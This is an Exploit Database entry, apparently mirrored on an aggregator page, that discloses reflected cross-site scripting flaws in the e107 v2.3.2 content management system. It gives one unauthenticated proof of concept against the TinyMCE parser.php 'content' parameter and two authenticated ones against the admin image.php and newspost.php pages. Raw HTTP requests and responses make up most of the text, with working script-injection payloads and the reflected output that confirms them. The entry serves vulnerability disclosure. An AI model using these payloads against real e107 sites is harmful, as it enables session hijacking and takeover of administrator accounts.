e107 v2.3.2 – Reflected XSS

• Exploit Database
• 15 阅读

• 作者： Hubert Wojciechowski
  日期： 2023-05-23
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51449/

• # Exploit Title: e107 v2.3.2 - Reflected XSS
  # Date: 11/05/2022
  # Exploit Author: Hubert Wojciechowski
  # Contact Author: hub.woj12345@gmail.com
  # Vendor Homepage: https://e107.org/
  # Software Link: https://e107.org/download
  # Version: 2.3.2
  # Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
  
  ### XSS Reflected - unauthorized
  
  URL: http://127.0.0.1/e107/e107_plugins/tinymce4/plugins/e107/parser.php
  Parameters: content
  
  # POC
  Request:
  POST /e107/e107_plugins/tinymce4/plugins/e107/parser.php HTTP/1.1
  Host: 127.0.0.1
  Content-Length: 1126
  sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
  Accept: text/html, */*; q=0.01
  Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  X-Requested-With: XMLHttpRequest
  sec-ch-ua-mobile: ?0
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
  sec-ch-ua-platform: "Windows"
  Origin: http://127.0.0.1
  Sec-Fetch-Site: same-origin
  Sec-Fetch-Mode: cors
  Sec-Fetch-Dest: empty
  Referer: http://127.0.0.1/e107/e107_admin/newspost.php?mode=main&action=edit&id=3
  Accept-Encoding: gzip, deflate
  Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
  Connection: close
  
  content=%5Bhtml%5D%3Cp%3E%3Cstrong%3ELore"/><script>alert(1)</script>bb&mode=tohtml
  
  Response:
  HTTP/1.1 200 OK
  Date: Thu, 11 May 2023 19:38:45 GMT
  Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
  X-Powered-By: PHP/7.4.29
  Set-Cookie: PHPSESSID=c4mphnf1igb7lbibn4q1eni10h; expires=Fri, 12-May-2023 19:38:45 GMT; Max-Age=86400; path=/e107/; HttpOnly
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate
  Pragma: no-cache
  Content-Length: 1053
  Connection: close
  Content-Type: text/html; charset=UTF-8
  
  <!-- bbcode-html-start --><p><strong>Lore"/><script>alert(1)</script>bb
  
  ### XSS Reflected - Authorized
  
  URL: http://127.0.0.1/e107/e107_admin/image.php
  Parameters: for
  
  # POC 1
  Request:
  GET /e107/e107_admin/image.php?mode=main&action=dialog&for=_commonh5it1%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253edezaw&tagid=media-cat-image&iframe=1&w=206&image=1 HTTP/1.1
  Host: 127.0.0.1
  Accept-Encoding: gzip, deflate
  Accept: */*
  Accept-Language: en-US;q=0.9,en;q=0.8
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
  Connection: close
  
  Response:
  HTTP/1.1 200 OK
  Date: Thu, 04 May 2023 03:07:35 GMT
  Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
  X-Powered-By: e107
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate
  Pragma: no-cache
  ETag: "37f107dbe6a998ecf7b71689627c2a56"
  Content-Length: 12420
  Vary: Accept-Encoding
  X-Frame-Options: SAMEORIGIN
  Connection: close
  Content-Type: text/html; charset=utf-8
  
  <!doctype html>
  <html lang="en">
  <head>
  <title>Media Manager - Admin Area :: hacked">bbbbb</title>
  <meta charset='utf-8' />
  <meta name="viewport" content="width=device-width, initial-scale=0.8, maximum-scale=1" />
  <!-- *CSS* -->
  [...]
  <div id="uploader" data-max-size="2mb" rel="/e107/e107_web/js/plupload/upload.php?for=_commonh5it1"><img src=a onerror=alert(1)>dezaw&path=">
  	<p>No HTML5 support.</p>
  		</div>
  [...]
  
  # POC 2
  
  URL: http://127.0.0.1/e107/e107_admin/newspost.php
  Parameters: Payload in URL
  
  Request:
  GET /e107/e107_admin/newspost.php/sdd4h"><script>alert(1)</script>kzb89?mode=main&action=list HTTP/1.1
  Host: 127.0.0.1
  Cache-Control: max-age=0
  sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
  sec-ch-ua-mobile: ?0
  sec-ch-ua-platform: "Windows"
  Upgrade-Insecure-Requests: 1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  Sec-Fetch-Site: same-origin
  Sec-Fetch-Mode: navigate
  Sec-Fetch-User: ?1
  Sec-Fetch-Dest: document
  Referer: http://127.0.0.1/e107/e107_admin/newspost.php?mode=main&action=edit&id=3
  Accept-Encoding: gzip, deflate
  Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
  Cookie: PHPSESSID=ftq2gnr1kgjqhfa3u902thraa8
  Connection: close
  
  Response:
  
  
  
  
  HTTP/1.1 200 OK
  Date: Fri, 05 May 2023 06:21:53 GMT
  Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
  X-Powered-By: e107
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate
  Pragma: no-cache
  ETag: "d127dd6a44a22e093fed60b83bf36af2"
  Content-Length: 72914
  Vary: Accept-Encoding
  X-Frame-Options: SAMEORIGIN
  Connection: close
  Content-Type: text/html; charset=utf-8
  
  <!doctype html>
  <html lang="en">
  <head>
  <title>News - List - Admin Area :: hacked">bbbbb</title>
  <meta charset='utf-8' />
  <meta name="viewport" content="width=device-width, initial-scale=0.8, maximum-scale=1" />
  <!-- *CSS* -->
  [...]
  <a class="btn btn-default btn-secondary nextprev-item next " href="http://127.0.0.1/e107/e107_admin/newspost.php/sdd4h">
  <script>alert(1)</script>kzb89/?mode=main&action=list&from=10" title="Go to the next page" ><i class="fa fa-forward"></i></a>
  [...]